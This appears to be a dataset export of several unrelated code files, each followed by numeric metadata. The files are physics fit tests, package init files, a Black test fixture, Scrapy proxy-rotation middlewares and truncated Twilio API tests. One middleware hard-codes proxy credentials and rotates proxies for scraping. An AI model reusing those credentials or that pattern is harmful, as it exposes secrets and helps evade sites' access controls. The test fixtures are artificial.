tracer = MockTracerPositions(positions=[np.array([[-2.0, -4.0], [1.0, 3.0], [0.1, 0.1], [-0.1, -0.1],
[0.3, 0.4], [-0.6, 0.5]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == np.sqrt(np.square(3.0) + np.square(7.0))
tracer = MockTracerPositions(positions=[np.array([[8.0, 4.0], [8.0, 4.0], [-9.0, -4.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == np.sqrt(np.square(17.0) + np.square(8.0))
def test_multiple_sets_of_positions__multiple_sets_of_max_distances(self):
tracer = MockTracerPositions(positions=[np.array([[0.0, 0.0], [0.0, 1.0], [0.0, 0.5]]),
np.array([[0.0, 0.0], [0.0, 0.0], [3.0, 3.0]]),
np.array([[0.0, 0.0], [1.0, 1.0], [3.0, 3.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == 1.0
assert fit.maximum_separations[1] == np.sqrt(18)
assert fit.maximum_separations[2] == np.sqrt(18)
def test__likelihood__is_sum_of_separations_divided_by_noise(self):
tracer = MockTracerPositions(positions=[np.array([[0.0, 0.0], [0.0, 1.0], [0.0, 0.5]]),
np.array([[0.0, 0.0], [0.0, 0.0], [3.0, 3.0]]),
np.array([[0.0, 0.0], [1.0, 1.0], [3.0, 3.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.chi_squared_map[0] == 1.0
assert fit.chi_squared_map[1] == pytest.approx(18.0, 1e-4)
assert fit.chi_squared_map[2] == pytest.approx(18.0, 1e-4)
assert fit.figure_of_merit == pytest.approx(-0.5 * (1.0 + 18 + 18), 1e-4)
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=2.0)
assert fit.chi_squared_map[0] == (1.0 / 2.0) ** 2.0
assert fit.chi_squared_map[1] == pytest.approx((np.sqrt(18.0) / 2.0) ** 2.0, 1e-4)
assert fit.chi_squared_map[2] == pytest.approx((np.sqrt(18.0) / 2.0) ** 2.0, 1e-4)
assert fit.figure_of_merit == pytest.approx(-0.5 * ((1.0 / 2.0) ** 2.0 + (np.sqrt(18.0) / 2.0) ** 2.0 +
(np.sqrt(18.0) / 2.0) ** 2.0), 1e-4)
def test__threshold__if_not_met_returns_ray_tracing_exception(self):
tracer = MockTracerPositions(positions=[np.array([[0.0, 0.0], [0.0, 1.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separation_within_threshold(threshold=100.0) == True
assert fit.maximum_separation_within_threshold(threshold=0.1) == False
| 58.413913
| 176
| 0.623333
| 8,255
| 67,176
| 4.663356
| 0.029558
| 0.018184
| 0.021743
| 0.023379
| 0.934305
| 0.921083
| 0.915939
| 0.903263
| 0.891729
| 0.881546
| 0
| 0.033905
| 0.291801
| 67,176
| 1,149
| 177
| 58.464752
| 0.775276
| 0.00195
| 0
| 0.71374
| 0
| 0
| 0.001193
| 0.000671
| 0
| 0
| 0
| 0
| 0.164122
| 1
| 0.044529
| false
| 0.001272
| 0.022901
| 0
| 0.109415
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2dc3e2a5293a5a3cd4c1eec32f3413798961851d
| 210
|
py
|
Python
|
keyboards/inline/__init__.py
|
Bainky/Ventify
|
638486dc5f265a4907a5a193ea2a7c9b44e8e943
|
[
"MIT"
] | 6
|
2021-03-11T11:43:17.000Z
|
2021-12-08T05:26:20.000Z
|
keyboards/inline/__init__.py
|
Bainky/Ventify
|
638486dc5f265a4907a5a193ea2a7c9b44e8e943
|
[
"MIT"
] | null | null | null |
keyboards/inline/__init__.py
|
Bainky/Ventify
|
638486dc5f265a4907a5a193ea2a7c9b44e8e943
|
[
"MIT"
] | 2
|
2021-03-24T05:31:12.000Z
|
2021-04-13T22:03:11.000Z
|
from .subcategories_menu import *
from .management_buttons import *
from .animals_categories import *
from .anime_categories import *
from logging import warning
warning("Imported: [keyboards/inline]")
| 26.25
| 39
| 0.780952
| 24
| 210
| 6.666667
| 0.583333
| 0.25
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 210
| 8
| 39
| 26.25
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0.137255
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
930c45412f500e803aca50e0e508f0db91921be2
| 230
|
py
|
Python
|
MuzzicApp/views.py
|
vibu267/muzzic
|
ca2c905c578ebb8c710fc673fe34071962967abf
|
[
"Apache-2.0"
] | null | null | null |
MuzzicApp/views.py
|
vibu267/muzzic
|
ca2c905c578ebb8c710fc673fe34071962967abf
|
[
"Apache-2.0"
] | null | null | null |
MuzzicApp/views.py
|
vibu267/muzzic
|
ca2c905c578ebb8c710fc673fe34071962967abf
|
[
"Apache-2.0"
] | null | null | null |
from django.shortcuts import render
from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.template import RequestContext
def index(request):
return render_to_response('index.html')
| 25.555556
| 47
| 0.834783
| 31
| 230
| 6.064516
| 0.516129
| 0.212766
| 0.202128
| 0.265957
| 0.329787
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113043
| 230
| 8
| 48
| 28.75
| 0.921569
| 0
| 0
| 0
| 0
| 0
| 0.043478
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.666667
| 0.166667
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
935f3e2d7a1b42b0112d6d3954b4b88737ef1742
| 1,132
|
py
|
Python
|
tests/data/comments_non_breaking_space.py
|
Pierre-Sassoulas/black
|
b09e024deefc61601983d3c5c7de1905de569480
|
[
"MIT"
] | null | null | null |
tests/data/comments_non_breaking_space.py
|
Pierre-Sassoulas/black
|
b09e024deefc61601983d3c5c7de1905de569480
|
[
"MIT"
] | null | null | null |
tests/data/comments_non_breaking_space.py
|
Pierre-Sassoulas/black
|
b09e024deefc61601983d3c5c7de1905de569480
|
[
"MIT"
] | null | null | null |
from .config import ( ConfigTypeAttributes, Int, Path, # String,
# DEFAULT_TYPE_ATTRIBUTES,
)
result = 1 # A simple comment with a NBSP
result = ( 1, ) # Another NBSP
result = 1 # type: ignore
result = 1# This comment is talking about type: ignore and start with NBSP
square = Square(4) # type: Optional[Square]
def function(a:int=42):
""" This docstring start with a NBSP
There is one NBSP column 5 here
This is 7 NBSP
"""
# There's a NBSP + 3 spaces before
# And 4 spaces on the next line
pass
# output
from .config import (
ConfigTypeAttributes,
Int,
Path, # String,
# DEFAULT_TYPE_ATTRIBUTES,
)
result = 1 # A simple comment with a NBSP
result = (1,) # Another NBSP
result = 1 # type: ignore
result = 1 # This comment is talking about type: ignore and start with NBSP
square = Square(4) # type: Optional[Square]
def function(a: int = 42):
"""This docstring start with a NBSP
There is one NBSP column 5 here
This is 7 NBSP
"""
# There's a NBSP + 3 spaces before
# And 4 spaces on the next line
pass
| 24.085106
| 76
| 0.636042
| 165
| 1,132
| 4.339394
| 0.290909
| 0.078212
| 0.050279
| 0.100559
| 0.99162
| 0.99162
| 0.99162
| 0.99162
| 0.99162
| 0.99162
| 0
| 0.027127
| 0.283569
| 1,132
| 46
| 77
| 24.608696
| 0.855734
| 0.579505
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0.095238
| 0.095238
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
fa7bb0f17632affcba803e7520acb9e06530ad3d
| 45
|
py
|
Python
|
opus/apps/__init__.py
|
Brychlikov/OPUS
|
380c0268cc77a2eac91ae7dd0f75f52444e7c665
|
[
"MIT"
] | null | null | null |
opus/apps/__init__.py
|
Brychlikov/OPUS
|
380c0268cc77a2eac91ae7dd0f75f52444e7c665
|
[
"MIT"
] | null | null | null |
opus/apps/__init__.py
|
Brychlikov/OPUS
|
380c0268cc77a2eac91ae7dd0f75f52444e7c665
|
[
"MIT"
] | 2
|
2020-07-13T12:50:31.000Z
|
2020-07-16T17:36:01.000Z
|
from . import prettyfier
from . import check
| 15
| 24
| 0.777778
| 6
| 45
| 5.833333
| 0.666667
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177778
| 45
| 2
| 25
| 22.5
| 0.945946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fa929ace6b1ea99f9feddbc4a254c1a3f64840aa
| 243
|
py
|
Python
|
qtensor/simplify_circuit/__init__.py
|
marwahaha/QTensor
|
936d078825a6418f9d32d2c176332422d8a4c137
|
[
"BSD-3-Clause"
] | 20
|
2020-09-08T20:32:44.000Z
|
2022-03-18T11:27:57.000Z
|
qtensor/simplify_circuit/__init__.py
|
marwahaha/QTensor
|
936d078825a6418f9d32d2c176332422d8a4c137
|
[
"BSD-3-Clause"
] | 21
|
2020-10-09T04:44:48.000Z
|
2021-10-05T03:32:35.000Z
|
qtensor/simplify_circuit/__init__.py
|
marwahaha/QTensor
|
936d078825a6418f9d32d2c176332422d8a4c137
|
[
"BSD-3-Clause"
] | 4
|
2020-12-18T01:37:10.000Z
|
2021-07-26T21:24:20.000Z
|
from .simplify_circuit import simplify_circuit
from . import gates
from .simplify_circuit_api import simplify_qtree_circuit
from .simplify_circuit_api import get_simplifiable_circuit_composer
from .simplify_circuit_api import SimpQAOAComposer
| 40.5
| 67
| 0.897119
| 32
| 243
| 6.40625
| 0.34375
| 0.365854
| 0.370732
| 0.321951
| 0.409756
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082305
| 243
| 5
| 68
| 48.6
| 0.919283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
87891703f2f56f13d9ae19cb72cf6918d3ecfb8c
| 204
|
py
|
Python
|
usfgan/layers/__init__.py
|
chomeyama/UnifiedSourceFilterGAN
|
ffb111a1b5f30d40b7170656c451640ca5abb514
|
[
"MIT"
] | 13
|
2021-04-07T04:26:16.000Z
|
2021-09-06T02:17:02.000Z
|
usfgan/layers/__init__.py
|
chomeyama/UnifiedSourceFilterGAN
|
ffb111a1b5f30d40b7170656c451640ca5abb514
|
[
"MIT"
] | null | null | null |
usfgan/layers/__init__.py
|
chomeyama/UnifiedSourceFilterGAN
|
ffb111a1b5f30d40b7170656c451640ca5abb514
|
[
"MIT"
] | 1
|
2021-04-22T22:38:02.000Z
|
2021-04-22T22:38:02.000Z
|
from usfgan.layers.residual_block import * # NOQA
from usfgan.layers.upsample import * # NOQA
from usfgan.layers.source_network import * # NOQA
from usfgan.layers.filter_network import * # NOQA
| 40.8
| 50
| 0.754902
| 27
| 204
| 5.592593
| 0.407407
| 0.264901
| 0.423841
| 0.397351
| 0.516556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 204
| 4
| 51
| 51
| 0.888235
| 0.093137
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
87a25226bd0762b51dbc6f4dc4e2e63e3990cb46
| 7,537
|
py
|
Python
|
gorden_crawler/middlewares/proxy_ats.py
|
Enmming/gorden_cralwer
|
3c279e4f80eaf90f3f03acd31b75cf991952adee
|
[
"Apache-2.0"
] | 2
|
2019-02-22T13:51:08.000Z
|
2020-08-03T14:01:30.000Z
|
gorden_crawler/middlewares/proxy_ats.py
|
Enmming/gorden_cralwer
|
3c279e4f80eaf90f3f03acd31b75cf991952adee
|
[
"Apache-2.0"
] | null | null | null |
gorden_crawler/middlewares/proxy_ats.py
|
Enmming/gorden_cralwer
|
3c279e4f80eaf90f3f03acd31b75cf991952adee
|
[
"Apache-2.0"
] | 1
|
2020-08-03T14:01:32.000Z
|
2020-08-03T14:01:32.000Z
|
import base64
import re
import datetime
import random
import os
class AsiaOpenProxyRandomMiddleware(object):
def process_request(self, request, spider):
proxy_ips = [
'https://sg.proxymesh.com:31280',
'https://jp.proxymesh.com:31280',
]
randint = random.randint(0, len(proxy_ips) - 1)
randip = proxy_ips[randint]
request.meta['proxy'] = randip
class OpenProxyRandomMiddleware(object):
def process_request(self, request, spider):
proxy_ips = [
'https://us-dc.proxymesh.com:31280',
# 'https://us-fl.proxymesh.com:31280',
# 'https://de.proxymesh.com:31280',
# 'https://nl.proxymesh.com:31280',
# 'https://sg.proxymesh.com:31280',
# 'https://jp.proxymesh.com:31280',
# 'https://ch.proxymesh.com:31280',
'https://us-ca.proxymesh.com:31280',
'https://us-ny.proxymesh.com:31280',
'https://us-il.proxymesh.com:31280',
# 'https://uk.proxymesh.com:31280',
]
# if os.environ['yelp_country'] == 'hk' or os.environ['yelp_country'] == 'tw' or os.environ['yelp_country'] == 'sg':
# proxy_ips = [
# 'https://sg.proxymesh.com:31280',
# 'https://jp.proxymesh.com:31280',
# ]
# elif os.environ['yelp_country'] == 'uk' or os.environ['yelp_country'] == 'de' or os.environ['yelp_country'] == 'nl':
# proxy_ips = [
# 'https://uk.proxymesh.com:31280',
# ]
# elif os.environ['yelp_country'] == 'usa':
# proxy_ips = [
# # 'https://us-dc.proxymesh.com:31280',
# # 'https://us-fl.proxymesh.com:31280',
# 'https://us-ca.proxymesh.com:31280',
# # 'https://us-ny.proxymesh.com:31280',
# # 'https://us-il.proxymesh.com:31280',
# ]
randint = random.randint(0, len(proxy_ips) - 1)
randip = proxy_ips[randint]
request.meta['proxy'] = randip
# print 'ip: ' + randip
# "https://us-il.proxymesh.com:31280"
# request.meta['proxy'] = "http://45.63.58.8:8080"
# proxy_user_pass = "root:wniiroacp!7"
# proxy_user_pass = "reeves:11111111"
# encoded_user_pass = base64.encodestring(proxy_user_pass)
# request.headers['Proxy-Authorization'] = 'Basic ' + encoded_user_pass
class OpenProxyMiddleware(object):
def process_request(self, request, spider):
request.meta['proxy'] = "https://us-ny.proxymesh.com:31280" # "http://45.63.58.8:8080"
# request.meta['proxy'] = "http://45.63.58.8:8080"
# proxy_user_pass = "root:wniiroacp!7"
proxy_user_pass = "reeves:11111111"
encoded_user_pass = base64.encodestring(proxy_user_pass)
request.headers['Proxy-Authorization'] = 'Basic ' + encoded_user_pass
class ProxyMiddleware(object):
def process_request(self, request, spider):
url = request.url
today = datetime.date.today()
today_day = int(today.strftime("%d"))
# if not re.match(r"^https", url):
today_proxy = today_day % 3
if today_proxy == 0:
request.meta['proxy'] = "https://us.proxymesh.com:31280" # "http://45.63.58.8:8080"
elif today_proxy == 1:
request.meta['proxy'] = "https://us-dc.proxymesh.com:31280" # "http://45.63.58.8:8080"
else:
request.meta['proxy'] = "https://us-il.proxymesh.com:31280" # "http://45.63.58.8:8080"
# request.meta['proxy'] = "http://45.63.58.8:8080"
# proxy_user_pass = "root:wniiroacp!7"
proxy_user_pass = "reeves:11111111"
encoded_user_pass = base64.encodestring(proxy_user_pass)
request.headers['Proxy-Authorization'] = 'Basic ' + encoded_user_pass
# else:
# request.headers['Proxy-Authorization'] = ''
# request.meta['proxy'] = ''
class ProxyWeeklyRandomHttpsMiddleware(object):
    """Rotate among three US proxymesh endpoints, keyed on the day of the
    month (day % 3): 0 -> us-wa, 1 -> us-dc, 2 -> us-ca."""

    _ROTATION = (
        "https://us-wa.proxymesh.com:31280",
        "https://us-dc.proxymesh.com:31280",
        "https://us-ca.proxymesh.com:31280",
    )

    def process_request(self, request, spider):
        # Same mapping as an if/elif chain on day % 3, expressed as a lookup.
        day_of_month = int(datetime.date.today().strftime("%d"))
        request.meta['proxy'] = self._ROTATION[day_of_month % 3]
class ProxyHttpsMiddleware(object):
    """Force all traffic through the US-IL proxymesh endpoint."""

    _PROXY = "https://us-il.proxymesh.com:31280"

    def process_request(self, request, spider):
        # spider is unused; required by the downloader-middleware signature.
        request.meta['proxy'] = self._PROXY
class ProxyUSAMiddleware(object):
    """Route all traffic through the US proxymesh endpoint with
    Basic-auth credentials."""

    def process_request(self, request, spider):
        """Set the fixed proxy and its auth header on ``request``."""
        request.meta['proxy'] = "https://us.proxymesh.com:31280"
        # SECURITY NOTE(review): hard-coded credentials; move to settings.
        proxy_user_pass = "reeves:11111111"
        # b64encode replaces base64.encodestring (removed in Python 3.9,
        # required bytes, appended a trailing newline to the header).
        encoded_user_pass = base64.b64encode(proxy_user_pass.encode('ascii')).decode('ascii')
        request.headers['Proxy-Authorization'] = 'Basic ' + encoded_user_pass
class ProxyGiltMiddleware(object):
    """Force all traffic through the Australian proxymesh endpoint."""

    _PROXY = 'https://au.proxymesh.com:31280'

    def process_request(self, request, spider):
        # spider is unused; required by the downloader-middleware signature.
        request.meta['proxy'] = self._PROXY
class ProxyUKMiddleware(object):
    """Force all traffic through the UK proxymesh endpoint."""

    _PROXY = "https://uk.proxymesh.com:31280"

    def process_request(self, request, spider):
        # spider is unused; required by the downloader-middleware signature.
        request.meta['proxy'] = self._PROXY
class ProxyHttpsUSAMiddleware(object):
    """Force all traffic through the US proxymesh endpoint (no auth header)."""

    _PROXY = "https://us.proxymesh.com:31280"

    def process_request(self, request, spider):
        # spider is unused; required by the downloader-middleware signature.
        request.meta['proxy'] = self._PROXY
class ProxynHttpsNLMiddleware(object):
    """Force all traffic through the Netherlands proxymesh endpoint.

    NOTE(review): class name keeps the original 'Proxyn' spelling because
    settings files may reference it by name.
    """

    _PROXY = "https://nl.proxymesh.com:31280"

    def process_request(self, request, spider):
        # spider is unused; required by the downloader-middleware signature.
        request.meta['proxy'] = self._PROXY
class ProxynHttpsSGMiddleware(object):
    """Force all traffic through the Singapore proxymesh endpoint.

    NOTE(review): class name keeps the original 'Proxyn' spelling because
    settings files may reference it by name.
    """

    _PROXY = "https://sg.proxymesh.com:31280"

    def process_request(self, request, spider):
        # spider is unused; required by the downloader-middleware signature.
        request.meta['proxy'] = self._PROXY
class ProxyHttpsRandomMiddleware(object):
    """Assign a uniformly random proxymesh endpoint to each request.

    The final empty-string entry presumably means "no proxy" for roughly
    one request in twelve — TODO confirm how downstream code treats an
    empty ``meta['proxy']``.
    """

    _CHOICES = (
        "https://us-il.proxymesh.com:31280",
        "https://us-ca.proxymesh.com:31280",
        "https://us-dc.proxymesh.com:31280",
        "https://us-fl.proxymesh.com:31280",
        "https://us-wa.proxymesh.com:31280",
        "https://us-ny.proxymesh.com:31280",
        "https://us.proxymesh.com:31280",
        "https://uk.proxymesh.com:31280",
        'https://au.proxymesh.com:31280',
        "https://nl.proxymesh.com:31280",
        "https://sg.proxymesh.com:31280",
        "",
    )

    def process_request(self, request, spider):
        request.meta['proxy'] = random.choice(self._CHOICES)
class ProxyHttpsUSAILMiddleware(object):
    """Force all traffic through the US-IL proxymesh endpoint."""

    _PROXY = "https://us-il.proxymesh.com:31280"

    def process_request(self, request, spider):
        # spider is unused; required by the downloader-middleware signature.
        request.meta['proxy'] = self._PROXY
class ProxyHttpsUSACAMiddleware(object):
    """Force all traffic through the US-CA proxymesh endpoint."""

    _PROXY = "https://us-ca.proxymesh.com:31280"

    def process_request(self, request, spider):
        # spider is unused; required by the downloader-middleware signature.
        request.meta['proxy'] = self._PROXY
class ProxyHttpsUSADCMiddleware(object):
    """Force all traffic through the US-DC proxymesh endpoint."""

    _PROXY = "https://us-dc.proxymesh.com:31280"

    def process_request(self, request, spider):
        # spider is unused; required by the downloader-middleware signature.
        request.meta['proxy'] = self._PROXY
class ProxyHttpsUSAFLMiddleware(object):
def process_request(self, request, spider):
request.meta['proxy'] = "https://us-fl.proxymesh.com:31280"
class ProxyHttpsUSAWAMiddleware(object):
def process_request(self, request, spider):
request.meta['proxy'] = "https://us-wa.proxymesh.com:31280"
| 36.946078
| 134
| 0.592676
| 853
| 7,537
| 5.138335
| 0.117233
| 0.142368
| 0.201688
| 0.130504
| 0.83071
| 0.790098
| 0.778919
| 0.749487
| 0.719827
| 0.698152
| 0
| 0.075155
| 0.249701
| 7,537
| 203
| 135
| 37.128079
| 0.699912
| 0.255937
| 0
| 0.526316
| 0
| 0
| 0.248873
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.157895
| false
| 0.078947
| 0.04386
| 0
| 0.359649
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
87f135debed373b33e9d602b5dd4d1ba948cf1ff
| 7,225
|
py
|
Python
|
tests/integration/messaging/v1/test_brand_registration.py
|
MikeOwino/twilio-python
|
e5c0f749eaa1a44fab12dd40cd2e7618cb2ce836
|
[
"MIT"
] | 1,362
|
2015-01-04T10:25:18.000Z
|
2022-03-24T10:07:08.000Z
|
tests/integration/messaging/v1/test_brand_registration.py
|
MikeOwino/twilio-python
|
e5c0f749eaa1a44fab12dd40cd2e7618cb2ce836
|
[
"MIT"
] | 299
|
2015-01-30T09:52:39.000Z
|
2022-03-31T23:03:02.000Z
|
tests/integration/messaging/v1/test_brand_registration.py
|
kaidisn/twilio-python
|
63d09bea6ea58a1e1f52420eab056480ad01dc61
|
[
"MIT"
] | 622
|
2015-01-03T04:43:09.000Z
|
2022-03-29T14:11:00.000Z
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class BrandRegistrationTestCase(IntegrationTestCase):
    """Auto-generated integration tests for the Messaging v1
    BrandRegistration resource.

    Each *_request test mocks a 500 response so the client raises after
    sending, letting the test assert only on the outgoing request shape.
    Each *_response test mocks a canned API payload and checks that the
    client parses it without raising.
    """

    def test_fetch_request(self):
        # Force a failure so fetch() raises after issuing the HTTP request.
        self.holodeck.mock(Response(500, ''))

        with self.assertRaises(TwilioException):
            self.client.messaging.v1.brand_registrations("BNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()

        # Verify the GET went to the expected resource URL.
        self.holodeck.assert_has_request(Request(
            'get',
            'https://messaging.twilio.com/v1/a2p/BrandRegistrations/BNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
        ))

    def test_fetch_response(self):
        # Canned single-resource payload returned by the mocked transport.
        self.holodeck.mock(Response(
            200,
            '''
            {
                "sid": "BN0044409f7e067e279523808d267e2d85",
                "account_sid": "AC78e8e67fc0246521490fb9907fd0c165",
                "customer_profile_bundle_sid": "BU3344409f7e067e279523808d267e2d85",
                "a2p_profile_bundle_sid": "BU3344409f7e067e279523808d267e2d85",
                "date_created": "2021-01-27T14:18:35Z",
                "date_updated": "2021-01-27T14:18:36Z",
                "brand_type": "STANDARD",
                "status": "PENDING",
                "tcr_id": "BXXXXXX",
                "failure_reason": "Registration error",
                "url": "https://messaging.twilio.com/v1/a2p/BrandRegistrations/BN0044409f7e067e279523808d267e2d85",
                "brand_score": 42,
                "brand_feedback": [
                    "TAX_ID",
                    "NONPROFIT"
                ],
                "identity_status": "VERIFIED",
                "russell_3000": true,
                "tax_exempt_status": "501c3",
                "skip_automatic_sec_vet": false,
                "mock": false,
                "links": {
                    "brand_vettings": "https://messaging.twilio.com/v1/a2p/BrandRegistrations/BN0044409f7e067e279523808d267e2d85/Vettings"
                }
            }
            '''
        ))

        actual = self.client.messaging.v1.brand_registrations("BNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()

        # Parsing succeeded; field-level assertions are not generated.
        self.assertIsNotNone(actual)

    def test_list_request(self):
        # Force a failure so list() raises after issuing the HTTP request.
        self.holodeck.mock(Response(500, ''))

        with self.assertRaises(TwilioException):
            self.client.messaging.v1.brand_registrations.list()

        # Verify the GET went to the collection URL.
        self.holodeck.assert_has_request(Request(
            'get',
            'https://messaging.twilio.com/v1/a2p/BrandRegistrations',
        ))

    def test_read_response(self):
        # Canned one-page list payload with standard paging metadata.
        self.holodeck.mock(Response(
            200,
            '''
            {
                "meta": {
                    "page": 0,
                    "page_size": 50,
                    "first_page_url": "https://messaging.twilio.com/v1/a2p/BrandRegistrations?PageSize=50&Page=0",
                    "previous_page_url": null,
                    "next_page_url": null,
                    "key": "data",
                    "url": "https://messaging.twilio.com/v1/a2p/BrandRegistrations?PageSize=50&Page=0"
                },
                "data": [
                    {
                        "sid": "BN0044409f7e067e279523808d267e2d85",
                        "account_sid": "AC78e8e67fc0246521490fb9907fd0c165",
                        "customer_profile_bundle_sid": "BU3344409f7e067e279523808d267e2d85",
                        "a2p_profile_bundle_sid": "BU3344409f7e067e279523808d267e2d85",
                        "date_created": "2021-01-27T14:18:35Z",
                        "date_updated": "2021-01-27T14:18:36Z",
                        "brand_type": "STANDARD",
                        "status": "APPROVED",
                        "tcr_id": "BXXXXXX",
                        "failure_reason": "Registration error",
                        "url": "https://messaging.twilio.com/v1/a2p/BrandRegistrations/BN0044409f7e067e279523808d267e2d85",
                        "brand_score": 42,
                        "brand_feedback": [
                            "TAX_ID",
                            "NONPROFIT"
                        ],
                        "identity_status": "VERIFIED",
                        "russell_3000": true,
                        "tax_exempt_status": "501c3",
                        "skip_automatic_sec_vet": false,
                        "mock": false,
                        "links": {
                            "brand_vettings": "https://messaging.twilio.com/v1/a2p/BrandRegistrations/BN0044409f7e067e279523808d267e2d85/Vettings"
                        }
                    }
                ]
            }
            '''
        ))

        actual = self.client.messaging.v1.brand_registrations.list()

        self.assertIsNotNone(actual)

    def test_create_request(self):
        # Force a failure so create() raises after issuing the HTTP request.
        self.holodeck.mock(Response(500, ''))

        with self.assertRaises(TwilioException):
            self.client.messaging.v1.brand_registrations.create(customer_profile_bundle_sid="BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", a2p_profile_bundle_sid="BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX")

        # Expected form-encoded POST body.
        values = {
            'CustomerProfileBundleSid': "BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
            'A2PProfileBundleSid': "BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
        }

        self.holodeck.assert_has_request(Request(
            'post',
            'https://messaging.twilio.com/v1/a2p/BrandRegistrations',
            data=values,
        ))

    def test_create_response(self):
        # Canned 201 Created payload for a freshly registered brand.
        self.holodeck.mock(Response(
            201,
            '''
            {
                "sid": "BN0044409f7e067e279523808d267e2d85",
                "account_sid": "AC78e8e67fc0246521490fb9907fd0c165",
                "customer_profile_bundle_sid": "BU0000009f7e067e279523808d267e2d90",
                "a2p_profile_bundle_sid": "BU1111109f7e067e279523808d267e2d85",
                "date_created": "2021-01-28T10:45:51Z",
                "date_updated": "2021-01-28T10:45:51Z",
                "brand_type": "STANDARD",
                "status": "PENDING",
                "tcr_id": "BXXXXXX",
                "failure_reason": "Registration error",
                "url": "https://messaging.twilio.com/v1/a2p/BrandRegistrations/BN0044409f7e067e279523808d267e2d85",
                "brand_score": 42,
                "brand_feedback": [
                    "TAX_ID",
                    "NONPROFIT"
                ],
                "identity_status": "VERIFIED",
                "russell_3000": true,
                "tax_exempt_status": "501c3",
                "skip_automatic_sec_vet": false,
                "mock": false,
                "links": {
